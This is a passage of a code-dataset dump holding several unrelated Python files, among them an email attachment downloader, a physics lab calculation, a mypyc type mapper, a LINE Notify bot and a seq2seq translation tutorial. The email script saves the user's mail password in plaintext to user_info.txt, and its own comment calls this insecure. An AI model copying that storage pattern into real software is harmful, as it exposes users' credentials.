mail server address: ')\n
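# NOTE: the three answers below are cached as plain text in user_info.txt for later runs -- convenient, but not secure.\n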
 user = input('Enter the email address: ')\n passwd = input('Enter the email password: ')\n with open('user_info.txt', 'w') as write_file:\n write_file.write(host + '\\n')\n write_file.write(user + '\\n')\n write_file.write(passwd + '\\n')\n # header cells to look up (Chinese literals kept: they match the spreadsheet contents)\n str_list = ['日期','单位净值','市值','银行存款','存出保证金']\n\n # log in and keep a reference to the mailbox connection\n mail_count_num, pop_conn = log_in(host, user, passwd)\n\n # date (taken from the subject line) of the mails to process\n request_date = input('Enter a date in the format 20141213, or press Enter for today: ') # requested date\n today = time.localtime(time.time())\n today_str = time.strftime(\"%Y%m%d\", today) # today, formatted\n\n # create the output directory and the summary workbook for the requested date\n currentpath = os.getcwd() # current directory\n foldername = request_date # folder name and final output file name\n new_path = os.path.join(currentpath, foldername) # storage path as a string\n if not os.path.exists(new_path): # create the folder if it does not exist\n os.makedirs(new_path)\n # switch the working directory and create the summary .xlsx workbook\n os.chdir(new_path)\n wb = Workbook()\n sheet = wb.active\n sheet.column_dimensions['A'].width = 42\n sheet.column_dimensions['B'].width = 9.2\n sheet.column_dimensions['C'].width = 8.4\n sheet.column_dimensions['D'].width = 12\n sheet.column_dimensions['E'].width = 12\n table_head = ['产品名称', '估值日期', '单位净值', '银行存款', '证券余额']\n sheet.append(table_head)\n\n # start iterating over the mailbox\n skipped_num = 0\n if request_date == '':\n request_date = today_str\n if (datetime.datetime.strptime(today_str, '%Y%m%d') - datetime.datetime.strptime(request_date, '%Y%m%d')).days >= 7:\n retri_num, fzd = binary_search(mail_count_num, request_date)\n print('Starting retrieval from message %s...' % retri_num)\n for i in range(retri_num, mail_count_num, 1):\n msg, address, subject, send_date = retrive(pop_conn, i)\n print(subject)\n if get_title_date(address, subject):\n title_date = get_title_date(address, subject)[0]\n if title_date == request_date:\n print('Downloading mail...')\n down_parse_attachment(msg, subject)\n print('Download finished...')\n else:\n skipped_num = skipped_num + 1\n print('Subject date does not match, skipping...')\n else:\n skipped_num = skipped_num + 1\n print('No date found in subject, skipping...')\n else:\n for i in range(mail_count_num, 0, -1):\n msg, address, subject, send_date = retrive(pop_conn, i)\n print(subject)\n if get_title_date(address, subject):\n title_date = get_title_date(address, subject)[0]\n if title_date == request_date:\n down_parse_attachment(msg, subject)\n else:\n skipped_num = skipped_num + 1\n print('Subject date does not match, skipping...')\n else:\n skipped_num = skipped_num + 1\n print('No date found in subject, skipping...')\n print('Skipped %s messages in total' % skipped_num)\n\n wb.save('%s汇总表.xlsx' % foldername)\n print('=============== DONE ===============\\n')\n pop_conn.quit()\n","repo_name":"915288938lx/email_download_7","sub_path":"email_download_3.py","file_name":"email_download_3.py","file_ext":"py","file_size_in_byte":13051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"27137228254","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\nfrom uncertainties import ufloat\nimport uncertainties.unumpy as unp\nimport scipy.constants as const\nfrom pylab import * \n\n\nl = np.array([0.67,0.66,0.66,0.66,0.67,0.67,0.66,0.68,0.67])\nL1 = np.mean(l) # wire length, without error\ndL = np.std(l, ddof=1) / np.sqrt(len(l)) # standard error of the mean\n\nL = ufloat(L1,dL) # wire length\n\nd = np.array([0.00016,0.00017,0.00016,0.00016,0.00017])\nDu = np.mean(d) # wire diameter\ndD = np.std(d, ddof=1) / np.sqrt(len(d))\nR1 = Du/2\ndR = dD/2\n\nR = ufloat(R1, dR) # wire radius\n\nt = np.array([18.544,18.540,18.551,18.570,18.252,18.537,18.579,18.563,18.554,18.589])\nTges = np.mean(t) \ndT = np.std(t, ddof=1) / np.sqrt(len(t))\n\nT = ufloat(Tges, dT) # oscillation period\n\n
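# From here on, ufloat/uarray values propagate the standard errors through every formula automatically (uncertainties package).\n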
Mk = ufloat(0.5883, 0.0004*0.5883) # mass of the sphere\n\nRk = ufloat(0.025515, 0.0004*0.025515) # radius of the sphere\n\ntetaKugel = (2/5)*Mk*(Rk**2)\ntetaHalt = 22.5*10**(-7)\n\nteta = tetaKugel + tetaHalt # total moment of inertia\n\n# compute the mean values\nt0 = np.array([11.310,11.102,11.101]) # measured values\nT00 = np.mean(t0) # mean\ndT0 = np.std(t0, ddof=1) / np.sqrt(len(t0)) # standard error of the mean\nT0 = ufloat(T00,dT0) # period with uncertainty\n\nt1 = np.array([8.756,8.779,8.762])\nT01 = np.mean(t1)\ndT1 = np.std(t1, ddof=1) / np.sqrt(len(t1))\nT1 = ufloat(T01,dT1)\n\nt2 = np.array([7.467,7.465,7.460])\nT02 = np.mean(t2)\ndT2 = np.std(t2, ddof=1) / np.sqrt(len(t2))\nT2 = ufloat(T02,dT2)\n\nt3 = np.array([6.583,6.608,6.596])\nT03 = np.mean(t3)\ndT3 = np.std(t3, ddof=1) / np.sqrt(len(t3))\nT3 = ufloat(T03,dT3)\n\nt4 = np.array([5.975,5.973,5.981])\nT04 = np.mean(t4)\ndT4 = np.std(t4, ddof=1) / np.sqrt(len(t4))\nT4 = ufloat(T04,dT4)\n\nt5 = np.array([5.521,5.526,5.519])\nT05 = np.mean(t5)\ndT5 = np.std(t5, ddof=1) / np.sqrt(len(t5))\nT5 = ufloat(T05,dT5)\n\nt6 = np.array([5.136,5.132,5.142])\nT06 = np.mean(t6)\ndT6 = np.std(t6, ddof=1) / np.sqrt(len(t6))\nT6 = ufloat(T06,dT6)\n\nt7 = np.array([4.578,4.577,4.865])\nT07 = np.mean(t7)\ndT7 = np.std(t7, ddof=1) / np.sqrt(len(t7))\nT7 = ufloat(T07,dT7)\n\nt8 = np.array([4.558,4.587,4.556])\nT08 = np.mean(t8)\ndT8 = np.std(t8, ddof=1) / np.sqrt(len(t8))\nT8 = ufloat(T08,dT8)\n\nt9 = np.array([4.336,4.330,4.344])\nT09 = np.mean(t9)\ndT9 = np.std(t9, ddof=1) / np.sqrt(len(t9))\nT9 = ufloat(T09,dT9)\n\n\nTges = np.array([T0,T1,T2,T3,T4,T5,T6,T7,T8,T9]) # oscillation periods\n\nI1 = np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0]) # current\ndI = np.array([0.025, 0.05, 0.075, 0.1, 0.125, 0.15, 0.175, 0.2, 0.225, 0.25]) # current error (5%)\n\nI = unp.uarray(I1, dI)\n\n
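# B() below is the on-axis field of the coil pair, with the coil spacing taken equal to the coil radius X.\n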
constant\"] #Magnetische Feldkonstante\nMu = mu[0] #Wert von der Konstante\nX = ufloat(0.072,0) #Radius und Abstand Helmholtzspule\nN = ufloat(80,0) #Windungen der Spulen\n\ndef B(X,N,Mu,I): \n return I*Mu*N*X**2/((2*X**2)**(3/2)) #Magnetfeld B\n\nBm = np.mean(B(X,N,Mu,I))\n\ndef G(teta, L, T, R):\n return (8*math.pi*teta*L/((T**2)*(R**4))) #Trägheitsmodul G\n\nD = math.pi*G(teta, L, T, R)*R**4/(2*L) #Richtgröße des Zylinders\n\nx = (unp.nominal_values(B(X,N,Mu,I)))\ny = (unp.nominal_values(1/Tges**2))\n\ndef f(x, m, b): #ausgeichsgrade\n return m*x+b\n\nparams, covariance = curve_fit(f, x, y)\nerrors = np.diag(covariance)\n\nprint('m:', params[0], '+-', errors[0])\nprint('b:', params[1], '+-', errors[1])\n\nplt.plot(x, f(x, *params), 'r-', label = r'Ausgleichsgerade') #ausgleichsgrade\n\nST = ufloat(20.617223278946874, 0.16288964210396956) #Steigung der Ausgleichsgeraden\n\nplt.plot(x, y, 'bo', label=r'Messdaten')\n#plt.show()\n\ndef magnet(ST,Bm,D,teta):\n return 4*(math.pi)**2*ST*teta-(D/Bm)\n\nprint('magnet(ST,Bm,D,teta):',\"{:.5f}\".format(magnet(ST,Bm,D,teta)))","repo_name":"Remponator/MedPhy_AP","sub_path":"V102_Drehschwingung/Auswertung/Magnetisches_Moment.py","file_name":"Magnetisches_Moment.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"13572868122","text":"weight, inputs, goal_pred = 0.0, 1.1, 0.8\n\nfor x in range(4):\n pred = inputs * weight\n error = (pred - goal_pred) ** 2 \n er = goal_pred - pred\n delta = pred - goal_pred # how much node missed\n weight_delta = delta * inputs # derivative\n weight = weight - weight_delta\n\n print('pred= {}\\n error= {}\\n err= {} \\n delta= {}\\n weight_delta= {}\\n weight= {}'.format(pred, error, er, delta, weight_delta, weight))","repo_name":"spctr01/scratch","sub_path":"gradient_decent.py","file_name":"gradient_decent.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"18671512953","text":"\"\"\"\n列表推导式:快速生成列表元素的表达形式,通过for添加列表元素的简洁写法\n推导式基本格式: [计算公式 for 循环 if 判断]\n特点:\n 1)每循环一次,将计算公式的结果添加到列表中\n 2)计算公式可以使用遍历出的数据\n 3)for 遍历出的数据 必须满足 if 判断 才会使用计算公式生成元素\n\"\"\"\n\n\"\"\"\n需求:产生列表[0, 1, 2, 3, 4]\n\"\"\"\n\nmy_list = []\n\nfor i in range(0, 5):\n my_list.append(i)\n\nprint(my_list)\n\n# 形式1:[计算表达式 for 循环]\nmy_list = [i for i in range(0, 5)]\nprint(my_list)\n\n\"\"\"\n需求:产生列表[0, 2, 4, 6, 8, 10]\n\"\"\"\n\nmy_list = [i for i in range(0, 11, 2)]\nprint(my_list)\n\nmy_list = [i * 2 for i in range(0, 6)]\nprint(my_list)\n\n\"\"\"\n需求:有一个字符串'hello',生成['h', 'e', 'l', 'l', 'o']\n\"\"\"\n\n# print(list('hello'))\nmy_list = [c for c in 'hello']\nprint(my_list)\n\n\"\"\"\n需求:有一个列表[2, 1, 3, 4, 8, 9, 7],需要将列表中的偶数筛选出来,存成一个新列表:[2, 4, 8]\n\"\"\"\nmy_list = [2, 1, 3, 4, 8, 9, 7]\n\n# 思路:遍历 my_list 中的每个数据,判断数据是否为偶数,如果是偶数,则添加到新列表中\nret = []\nfor i in my_list:\n if i % 2 == 0:\n ret.append(i)\n\nprint(ret)\n\n# 形式2:[计算表达式 for 循环 if 条件]\nret = [i for i in my_list if i % 2 == 0]\nprint(ret)","repo_name":"ekolzzz/BigData","sub_path":"Python/0-basic/smart/day06/07-列表推导式.py","file_name":"07-列表推导式.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"9990006098","text":"\"\"\"Maintain a mapping from mypy concepts to IR/compiled concepts.\"\"\"\n\nfrom typing import Dict, Optional\n\nfrom mypy.nodes import FuncDef, TypeInfo, SymbolNode, ArgKind, ARG_STAR, 
ARG_STAR2\nfrom mypy.types import (\n Instance, Type, CallableType, LiteralType, TypedDictType, UnboundType, PartialType,\n UninhabitedType, Overloaded, UnionType, TypeType, AnyType, NoneTyp, TupleType, TypeVarType,\n get_proper_type\n)\n\nfrom mypyc.ir.rtypes import (\n RType, RUnion, RTuple, RInstance, object_rprimitive, dict_rprimitive, tuple_rprimitive,\n none_rprimitive, int_rprimitive, float_rprimitive, str_rprimitive, bool_rprimitive,\n list_rprimitive, set_rprimitive, range_rprimitive, bytes_rprimitive\n)\nfrom mypyc.ir.func_ir import FuncSignature, FuncDecl, RuntimeArg\nfrom mypyc.ir.class_ir import ClassIR\n\n\nclass Mapper:\n \"\"\"Keep track of mappings from mypy concepts to IR concepts.\n\n For example, we keep track of how the mypy TypeInfos of compiled\n classes map to class IR objects.\n\n This state is shared across all modules being compiled in all\n compilation groups.\n \"\"\"\n\n def __init__(self, group_map: Dict[str, Optional[str]]) -> None:\n self.group_map = group_map\n self.type_to_ir: Dict[TypeInfo, ClassIR] = {}\n self.func_to_decl: Dict[SymbolNode, FuncDecl] = {}\n\n def type_to_rtype(self, typ: Optional[Type]) -> RType:\n if typ is None:\n return object_rprimitive\n\n typ = get_proper_type(typ)\n if isinstance(typ, Instance):\n if typ.type.fullname == 'builtins.int':\n return int_rprimitive\n elif typ.type.fullname == 'builtins.float':\n return float_rprimitive\n elif typ.type.fullname == 'builtins.bool':\n return bool_rprimitive\n elif typ.type.fullname == 'builtins.str':\n return str_rprimitive\n elif typ.type.fullname == 'builtins.bytes':\n return bytes_rprimitive\n elif typ.type.fullname == 'builtins.list':\n return list_rprimitive\n # Dict subclasses are at least somewhat common and we\n # specifically support them, so make sure that dict operations\n # get optimized on them.\n elif any(cls.fullname == 'builtins.dict' for cls in typ.type.mro):\n return dict_rprimitive\n elif typ.type.fullname == 'builtins.set':\n return set_rprimitive\n elif typ.type.fullname == 'builtins.tuple':\n return tuple_rprimitive # Varying-length tuple\n elif typ.type.fullname == 'builtins.range':\n return range_rprimitive\n elif typ.type in self.type_to_ir:\n inst = RInstance(self.type_to_ir[typ.type])\n # Treat protocols as Union[protocol, object], so that we can do fast\n # method calls in the cases where the protocol is explicitly inherited from\n # and fall back to generic operations when it isn't.\n if typ.type.is_protocol:\n return RUnion([inst, object_rprimitive])\n else:\n return inst\n else:\n return object_rprimitive\n elif isinstance(typ, TupleType):\n # Use our unboxed tuples for raw tuples but fall back to\n # being boxed for NamedTuple.\n if typ.partial_fallback.type.fullname == 'builtins.tuple':\n return RTuple([self.type_to_rtype(t) for t in typ.items])\n else:\n return tuple_rprimitive\n elif isinstance(typ, CallableType):\n return object_rprimitive\n elif isinstance(typ, NoneTyp):\n return none_rprimitive\n elif isinstance(typ, UnionType):\n return RUnion([self.type_to_rtype(item)\n for item in typ.items])\n elif isinstance(typ, AnyType):\n return object_rprimitive\n elif isinstance(typ, TypeType):\n return object_rprimitive\n elif isinstance(typ, TypeVarType):\n # Erase type variable to upper bound.\n # TODO: Erase to union if object has value restriction?\n return self.type_to_rtype(typ.upper_bound)\n elif isinstance(typ, PartialType):\n assert typ.var.type is not None\n return self.type_to_rtype(typ.var.type)\n elif isinstance(typ, Overloaded):\n return 
object_rprimitive\n elif isinstance(typ, TypedDictType):\n return dict_rprimitive\n elif isinstance(typ, LiteralType):\n return self.type_to_rtype(typ.fallback)\n elif isinstance(typ, (UninhabitedType, UnboundType)):\n # Sure, whatever!\n return object_rprimitive\n\n # I think we've covered everything that is supposed to\n # actually show up, so anything else is a bug somewhere.\n assert False, 'unexpected type %s' % type(typ)\n\n def get_arg_rtype(self, typ: Type, kind: ArgKind) -> RType:\n if kind == ARG_STAR:\n return tuple_rprimitive\n elif kind == ARG_STAR2:\n return dict_rprimitive\n else:\n return self.type_to_rtype(typ)\n\n def fdef_to_sig(self, fdef: FuncDef) -> FuncSignature:\n if isinstance(fdef.type, CallableType):\n arg_types = [self.get_arg_rtype(typ, kind)\n for typ, kind in zip(fdef.type.arg_types, fdef.type.arg_kinds)]\n arg_pos_onlys = [name is None for name in fdef.type.arg_names]\n ret = self.type_to_rtype(fdef.type.ret_type)\n else:\n # Handle unannotated functions\n arg_types = [object_rprimitive for arg in fdef.arguments]\n arg_pos_onlys = [arg.pos_only for arg in fdef.arguments]\n # We at least know the return type for __init__ methods will be None.\n is_init_method = fdef.name == '__init__' and bool(fdef.info)\n if is_init_method:\n ret = none_rprimitive\n else:\n ret = object_rprimitive\n\n # mypyc FuncSignatures (unlike mypy types) want to have a name\n # present even when the argument is position only, since it is\n # the sole way that FuncDecl arguments are tracked. This is\n # generally fine except in some cases (like for computing\n # init_sig) we need to produce FuncSignatures from a\n # deserialized FuncDef that lacks arguments. We won't ever\n # need to use those inside of a FuncIR, so we just make up\n # some crap.\n if hasattr(fdef, 'arguments'):\n arg_names = [arg.variable.name for arg in fdef.arguments]\n else:\n arg_names = [name or '' for name in fdef.arg_names]\n\n args = [RuntimeArg(arg_name, arg_type, arg_kind, arg_pos_only)\n for arg_name, arg_kind, arg_type, arg_pos_only\n in zip(arg_names, fdef.arg_kinds, arg_types, arg_pos_onlys)]\n\n # We force certain dunder methods to return objects to support letting them\n # return NotImplemented. 
It also avoids some pointless boxing and unboxing,\n # since tp_richcompare needs an object anyways.\n if fdef.name in ('__eq__', '__ne__', '__lt__', '__gt__', '__le__', '__ge__'):\n ret = object_rprimitive\n return FuncSignature(args, ret)\n","repo_name":"Sarang0218/ResearchAndDevFor_Fardlang","sub_path":"venv/lib/python3.8/site-packages/mypyc/irbuild/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":7364,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"} +{"seq_id":"28306630271","text":"#!/usr/bin/python3\n\nclass JustCounter:\n __secretCount = 0 # private variable (name-mangled)\n publicCount = 0 # public variable\n\n def count(self):\n self.__secretCount += 1\n self.publicCount += 1\n print(self.__secretCount)\n\n def getSecretCount(self): # public accessor for the private counter\n return self.__secretCount\n\n\ncounter = JustCounter()\ncounter.count()\ncounter.count()\nprint(counter.publicCount)\n# print(counter.__secretCount) # raises AttributeError: instances cannot access the private variable directly\nprint(counter.getSecretCount()) # use the public accessor instead\n\n\n# If a subclass needs the parent's constructor, it must either call it explicitly\n# or simply not override the parent's constructor.\n#\n# If the subclass does not override __init__, instantiating it automatically calls\n# the parent's __init__.\n# If the subclass overrides __init__, the parent's __init__ is no longer called\n# automatically; to still run the parent's constructor, use the super keyword:\n#\n# super(SubClass, self).__init__(arg1, arg2, ...)\n# A classic alternative spelling is\n# ParentClass.__init__(self, arg1, arg2, ...)\n","repo_name":"Melo15Zhang/python","sub_path":"7-17/oop/private.py","file_name":"private.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40856104438","text":"def extractWwwIsecainovelsCom(item):\n\t'''\n\tParser for 'www.isecainovels.com'\n\t'''\n\n\tvol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])\n\tif not (chp or vol) or \"preview\" in item['title'].lower():\n\t\treturn None\n\n\ttagmap = [\n\t\t('Upstart Pastry Chef', 'Upstart Pastry Chef ~Territory Management of a Genius Pâtissier~', 'translated'),\n\t\t('Sono Mono Nochi ni', 'That Person. 
Later on…', 'translated'),\n\t\t('Starship Officer Becomes Adventurer', 'The Starship Officer Becomes An Adventurer', 'translated'),\n\t\t('The Wolf Lord\\'s Lady', 'The Wolf Lord\\'s Lady', 'translated'),\n\t\t('Black Tea Specialist', 'I am The Black Tea Specialist Cheat of The Chivalric Order!', 'translated'),\n\t\t('PRC', 'PRC', 'translated'),\n\t\t('Loiterous', 'Loiterous', 'oel'),\n\t]\n\n\tfor tagname, name, tl_type in tagmap:\n\t\tif tagname in item['tags']:\n\t\t\treturn buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)\n\n\n\treturn False","repo_name":"fake-name/ReadableWebProxy","sub_path":"WebMirror/management/rss_parser_funcs/feed_parse_extractWwwIsecainovelsCom.py","file_name":"feed_parse_extractWwwIsecainovelsCom.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"91"} +{"seq_id":"43116766990","text":"import requests\n\nclass LINENotifyBot:\n API_URL = 'https://notify-api.line.me/api/notify'\n def __init__(self, access_token):\n self.__headers = {'Authorization': 'Bearer ' + access_token}\n\n def send(\n self, message,\n image=None, sticker_package_id=None, sticker_id=None,\n ):\n payload = {\n 'message': message,\n 'stickerPackageId': sticker_package_id,\n 'stickerId': sticker_id,\n }\n files = {}\n if image != None:\n files = {'imageFile': open(image, 'rb')}\n r = requests.post(\n LINENotifyBot.API_URL,\n headers=self.__headers,\n data=payload,\n files=files,\n )\n\n def send_message_stamp():\n bot = DIF_LineNotify.LINENotifyBot(access_token='add your access token here') # enter your own access token\n bot.send(\n message='Write Your Message', # the text part of the message\n sticker_package_id=1, # from here on: the sticker to send\n sticker_id=13,\n )\n\n def send_message_stamp_image():\n bot = DIF_LineNotify.LINENotifyBot(access_token='add your access token here') # enter your own access token\n bot.send(\n message='Write Your Message', # the text part of the message\n image='test.png', # png or jpg; sends an image -- comment this out when there is no image\n sticker_package_id=1, # from here on: the sticker to send\n sticker_id=13,\n )\n","repo_name":"Naoki-Yoshizawa/ican2020","sub_path":"iCAN2020Python/DIF_LineNotify.py","file_name":"DIF_LineNotify.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"38298732113","text":"def foo(text,find,place):\n print(place+\" \"+find)\n number =text.find(find)\n if (number==-1):\n return\n else:\n text = text[0:number]+place+\" \"+find+text[number+len(find):len(text)]\n print(text)\n\ndef main():\n print(\"Enter a sentence: \",end=\"\")\n text =str(input())\n print(\"Would you like to put something before one of the words? (Y/N)\",end=\" \")\n character=str(input())\n if (character==\"N\"):\n print(text)\n else:\n print(\"Word to search for: \",end=\"\")\n find = str(input())\n print(\"What do you want to put before the word: \",end=\"\")\n place= str(input())\n foo(text,find,place)\n print(\"\"\"\\nIf Szondi comes, remember to check for a fast charger for the phone,\nwith cable and adapter, for the Redmi Note 9 Pro, and two BEZEL-FREE (frameless) glass screen protectors (for the Note 9 Pro and\nthe Huawei Mate 20 Lite) from Emag, plus the Code Vein Deluxe edition game at 4660 HUF, OCTOBER 10, 85% off. DARK SOULS GAME WIFU SOULS. 
AS SOON AS POSSIBLE\\n\"\"\")\n\nif __name__==\"__main__\":\n main()","repo_name":"CsukaDavid/BevProg","sub_path":"Gyakorlás/Homework_3_1.py","file_name":"Homework_3_1.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"71323119024","text":"#### https://pytorch.org/tutorials/intermediate/seq2seq_translation_tutorial.html\nfrom __future__ import unicode_literals, print_function, division\nfrom io import open\nimport unicodedata\nimport string\nimport re\nimport random\nimport os\nimport sys\n\nimport time\nimport math\n\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nimport matplotlib.ticker as ticker\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\n\nfrom bleu import *\nchencherry = SmoothingFunction()\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]='1,3,6,7'\n\n# Random Seed\ntorch.manual_seed(0)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(0)\nrandom.seed(0)\n\nSOS_token = 0\nEOS_token = 1\n\nMAX_LENGTH = 100\n\neng_prefixes = (\n \"i am \", \"i m \",\n \"he is\", \"he s \",\n \"she is\", \"she s \",\n \"you are\", \"you re \",\n \"we are\", \"we re \",\n \"they are\", \"they re \"\n)\n\n\n\ndef loadModel(model, path):\n # model.load_state_dict(torch.load('./model/classify_cifar10_49.pth'))\n model.load_state_dict(torch.load(path))\n return model\n\n\ndef saveModel(model, path):\n torch.save(model.state_dict(), path)\n\n\ndef convert_given(dictionary, data):\n s = \"\"\n for itm in range(0, data.shape[0]):\n s += str(dictionary[data[itm].item()]) + \" \"\n return s[:-1]\n\ndef convert(dictionary, data):\n s = \"\"\n # m = torch.max(data, dim=0)\n\n # print(data.shape)\n # print(m.shape)\n for itm in range(0, data.shape[0]):\n # print(torch.max(data[itm,:], dim=0)[1].detach().item())\n s += str(dictionary[torch.max(data[itm,:], dim=0)[1].detach().item()]) + \" \"\n return s[:-1]\n\n\nclass AttnDecoderRNN(nn.Module):\n def __init__(self, hidden_size, output_size, dropout_p=0.1, max_length=MAX_LENGTH):\n super(AttnDecoderRNN, self).__init__()\n self.hidden_size = hidden_size\n self.output_size = output_size\n self.dropout_p = dropout_p\n self.max_length = max_length\n\n self.embedding = nn.Embedding(self.output_size, self.hidden_size)\n self.attn = nn.Linear(self.hidden_size * 2, self.max_length)\n self.attn_combine = nn.Linear(self.hidden_size * 2, self.hidden_size)\n self.dropout = nn.Dropout(self.dropout_p)\n self.gru = nn.GRU(self.hidden_size, self.hidden_size)\n # self.lstm = nn.LSTM(self.hidden_size, self.hidden_size)\n self.out = nn.Linear(self.hidden_size, self.output_size)\n\n def forward(self, input, hidden, encoder_outputs):\n embedded = self.embedding(input).view(1, 1, -1)\n embedded = self.dropout(embedded)\n\n attn_weights = F.softmax(\n self.attn(torch.cat((embedded[0], hidden[0]), 1)), dim=1)\n attn_applied = torch.bmm(attn_weights.unsqueeze(0),\n encoder_outputs.unsqueeze(0))\n\n output = torch.cat((embedded[0], attn_applied[0]), 1)\n output = self.attn_combine(output).unsqueeze(0)\n\n output = F.relu(output)\n output, hidden = self.gru(output, hidden)\n # output, hidden = self.lstm(output, hidden)\n\n output = F.log_softmax(self.out(output[0]), dim=1)\n return output, hidden, attn_weights\n\n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, 
device=device)\n\n\nclass DecoderRNN(nn.Module):\n def __init__(self, hidden_size, output_size):\n super(DecoderRNN, self).__init__()\n self.hidden_size = hidden_size\n\n self.embedding = nn.Embedding(output_size, hidden_size)\n self.gru = nn.GRU(hidden_size, hidden_size)\n # self.lstm = nn.LSTM(hidden_size, hidden_size)\n self.out = nn.Linear(hidden_size, output_size)\n self.softmax = nn.LogSoftmax(dim=1)\n\n def forward(self, input, hidden):\n output = self.embedding(input).view(1, 1, -1)\n output = F.relu(output)\n output, hidden = self.gru(output, hidden)\n # output, hidden = self.lstm(output, hidden)\n output = self.softmax(self.out(output[0]))\n return output, hidden\n\n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, device=device)\n\n\nclass EncoderRNN(nn.Module):\n def __init__(self, input_size, hidden_size):\n super(EncoderRNN, self).__init__()\n self.hidden_size = hidden_size\n\n self.embedding = nn.Embedding(input_size, hidden_size)\n self.gru = nn.GRU(hidden_size, hidden_size)\n # self.lstm = nn.LSTM(hidden_size, hidden_size)\n\n def forward(self, input, hidden):\n embedded = self.embedding(input).view(1, 1, -1)\n output = embedded\n output, hidden = self.gru(output, hidden)\n # output, hidden = self.lstm(output, hidden.unsqueeze(0))\n return output, hidden\n\n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, device=device)\n\n\ndef filterPair(p):\n return len(p[0].split(' ')) < MAX_LENGTH and \\\n len(p[1].split(' ')) < MAX_LENGTH #and \\\n # p[1].startswith(eng_prefixes)\n\n\ndef filterPairs(pairs):\n return [pair for pair in pairs if filterPair(pair)]\n\n\n\nclass Lang:\n def __init__(self, name):\n self.name = name\n self.word2index = {}\n self.word2count = {}\n self.index2word = {0: \"SOS\", 1: \"EOS\"}\n self.n_words = 2 # Count SOS and EOS\n\n def addSentence(self, sentence):\n for word in sentence.split(' '):\n self.addWord(word)\n\n def addWord(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1\n\n\n# Turn a Unicode string to plain ASCII, thanks to\n# https://stackoverflow.com/a/518232/2809427\ndef unicodeToAscii(s):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n )\n\n\n# Lowercase, trim, and remove non-letter characters\ndef normalizeString(s):\n s = unicodeToAscii(s.lower().strip())\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n return s\n\n\ndef readLangs(lang1, lang2, reverse=False):\n print(\"Reading lines...\")\n\n # Read the file and split into lines\n train_lines = open('data/%s-%s-training.txt' % (lang1, lang2), encoding='utf-8').read().strip().split('\\n')[::10]\n valid_lines = open('data/%s-%s-validation.txt' % (lang1, lang2), encoding='utf-8').read().strip().split('\\n')\n\n # Split every line into pairs and normalize\n train_pairs = [[normalizeString(s) for s in l.split('\\t')] for l in train_lines]\n valid_pairs = [[normalizeString(s) for s in l.split('\\t')] for l in valid_lines]\n\n # Reverse pairs, make Lang instances\n if reverse:\n train_pairs = [list(reversed(p)) for p in train_pairs]\n valid_pairs = [list(reversed(p)) for p in valid_pairs]\n input_lang = Lang(lang2)\n output_lang = Lang(lang1)\n else:\n input_lang = Lang(lang1)\n output_lang = Lang(lang2)\n\n return input_lang, output_lang, train_pairs, valid_pairs\n\n\ndef prepareData(lang1, lang2, 
reverse=False):\n input_lang, output_lang, train_pairs, valid_pairs = readLangs(lang1, lang2, reverse)\n print(\"Read %s sentence pairs (training)\" % len(train_pairs))\n print(\"Read %s sentence pairs (validation)\" % len(valid_pairs))\n train_pairs = filterPairs(train_pairs)\n valid_pairs = filterPairs(valid_pairs)\n print(\"Trimmed to %s sentence pairs (training)\" % len(train_pairs))\n print(\"Trimmed to %s sentence pairs (validation)\" % len(valid_pairs))\n print(\"Counting words...\")\n for pair in train_pairs:\n input_lang.addSentence(pair[0])\n output_lang.addSentence(pair[1])\n\n for pair in valid_pairs:\n input_lang.addSentence(pair[0])\n output_lang.addSentence(pair[1])\n\n print(\"Counted words:\")\n print(input_lang.name, input_lang.n_words)\n print(output_lang.name, output_lang.n_words)\n return input_lang, output_lang, train_pairs, valid_pairs\n\n\ndef indexesFromSentence(lang, sentence):\n return [lang.word2index[word] for word in sentence.split(' ')]\n\n\ndef tensorFromSentence(lang, sentence):\n indexes = indexesFromSentence(lang, sentence)\n indexes.append(EOS_token)\n return torch.tensor(indexes, dtype=torch.long, device=device).view(-1, 1)\n\n\ndef tensorsFromPair(pair):\n input_tensor = tensorFromSentence(input_lang, pair[0])\n target_tensor = tensorFromSentence(output_lang, pair[1])\n return (input_tensor, target_tensor)\n\n\nteacher_forcing_ratio = 0.5\n\n\ndef 